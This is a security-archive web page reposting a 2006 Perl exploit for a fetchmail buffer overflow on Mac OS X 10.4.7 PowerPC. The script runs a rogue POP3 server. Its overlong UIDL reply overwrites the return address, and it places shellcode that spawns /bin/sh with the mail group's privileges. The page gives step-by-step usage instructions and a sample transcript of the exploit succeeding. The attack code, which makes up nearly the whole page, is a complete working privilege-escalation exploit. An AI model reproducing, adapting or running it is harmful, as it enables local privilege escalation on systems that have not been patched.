首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Mac OS X <= 10.4.7 fetchmail Privilege Escalation Exploit (ppc)
来源:http://www.digitalmunition.com 作者:kf 发布时间:2006-08-02  

#!/usr/bin/perl
# getpwnedmail.pl
#
# http://www.digitalmunition.com
# written by kf (kf_lists[at]digitalmunition[dot]com)
#
# This is a canibalized version of "Kansas City POP Daemon Version 0.0" - Copyright (c) 1999 David Nicol <davidnicol@acm.org>
#
# kevin-finisterres-mac-mini:~ kfinisterre$ /usr/bin/fetchmail -p pop3 --fastuidl 1 localhost -P 1234
# Enter password for kfinisterre@localhost:
# sh-2.05b$ id
# uid=501(kfinisterre) gid=501(kfinisterre) egid=6(mail) groups=6(mail), 81(appserveradm), 79(appserverusr), 80(admin)
#
# http://docs.info.apple.com/article.html?artnum=106704

use Socket;
use IO::Handle;
use IO::Socket;

$banner = "fetchmail ppc exploit - OSX 10.4.7 8J135";
$sc = "iiii" x 10 .
# * PPC MacOS X shellcode
# * ghandi <ghandi@mindless.com>
"\x7c\xa5\x2a\x79" . # /* xor. r5, r5, r5 ; r5 = NULL */
"\x40\xa2\xff\xfd" . # /* bnel shellcode */
"\x7f\xe8\x02\xa6" . # /* mflr r31 */
"\x3b\xff\x01\x30" . # /* addi r31, r31, 268+36 */
"\x38\x7f\xfe\xf4" . # /* addi r3, r31, -268 ; r3 = path */
"\x90\x61\xff\xf8" . # /* stw r3, -8(r1) ; argv[0] = path */
"\x90\xa1\xff\xfc" . # /* stw r5, -4(r1) ; argv[1] = NULL */
"\x38\x81\xff\xf8" . # /* subi r4, r1, 8 ; r4 = {path, 0} */
"\x3b\xc0\x76\x01" . # /* li r30, 30209 */
"\x7f\xc0\x4e\x70" . # /* srawi r0, r30, 9 */
"\x44\xff\xff\x02" . # /* sc ; execve(r3, r4, r5) */
"/bin/sh";

$eip = 0xbfffd238; # No NX to worry about so just hop right on into the stack.

$malstr = "A" x 196 . pack('l', $eip) x 2;

$PortNumber = 1234;
$door = IO::Socket::INET->new( Proto=>'tcp', LocalPort=>$PortNumber, Listen=>SOMAXCONN, Reuse=>1 );
die "Cannot set up socket: $!" unless $door;

$timeout = 60;
$SIG{ALRM} = sub { die "alarm or timeout\n" };

print "open a new window and type - \"/usr/bin/fetchmail -p pop3 --fastuidl 1 localhost -P 1234\"\n";
print "choose any password and press enter\n";
for(;;)
{
until( $client = $door->accept())
{
sleep 1;
};
$F = fork;
die "Fork weirdness: $!" if $F < 0;

if($F)
{
close $client;
next;
};

close ($door);

$client->autoflush();
&AUTHORIZATION;
&TRANSACTION;
exit;
};

sub OK($)
{
my $A = shift;
$A =~ s/\s+\Z//g;
print $client "+OK $A\r\n";
alarm $timeout;
};

sub ERR($)
{
my $A = shift;
$A =~ s/\s+/ /g;
$A =~ s/\s+\Z//g;
print $client "-ERR $A\r\n";
alarm $timeout;
};

sub AUTHORIZATION
{
$Name = '';
OK "$banner";
NEEDUSER:
$Data = <$client>;
($Name) = $Data =~ m/^user (\w+)/i;
unless($Name)
{
ERR "The itsy bitsy spider walked up the water spout";
die if ++$strikes > 5;
goto NEEDUSER;
};
OK "User name ($Name) ok. Password, please.";
$Data = <$client>;
my($Pass) = $Data =~ m/^pass (.*)/i;
$Pass =~ s/\s+\Z//g;

OK "$Name has " . 8 . " messages";
};

sub TRANSACTION
{
%deletia = ();
START:
$_ = $Data = <$client>;
unless(defined($Data))
{
print "Client closed connection\n";
exit;
};
if (m/^STAT/i){ &STAT; goto START};
if (m/^UIDL/i){ &UIDL; goto START};

# Just cram the shellcode onto the stack...
ERR "Welcome to Pwndertino ! $sc";

goto START;
}

sub STAT
{
alarm 0;
$mm = 0;
$nn = scalar(@Messages);
foreach $M (@Messages){
$mm += -s "$M";
};
OK "8 7035";
};

sub List($)
{
my $M = $Messages[$_[0]-1];
return if $deletia{$M};
print $client $_[0],' ',(-s $M)."\r\n";
alarm $timeout;
};

sub UIDL
{
print "Sending exploit string\n";
OK "1 " . $malstr;
};



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Mac OS X <= 10.4.7 fetchmai
·TWiki <= 4.0.4 (Configure S
·Mac OS X <= 10.4.7 fetchmai
·Mac OS X <= 10.3.8 (CF_CHAR
·XMB <= 1.9.6 (u2uid) Remote
·SendCard <= 3.4.0 Unauthori
·Open Cubic Player <= 2.6.0p
·XChat <= 2.6.7 (Windows Ver
·ATutor <= 1.5.3.1 (links) R
·myBloggie <= 2.1.4 (trackba
·vbPortal 3.0.2 <= 3.6.0 b1
·eIQnetworks License Manager Re
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved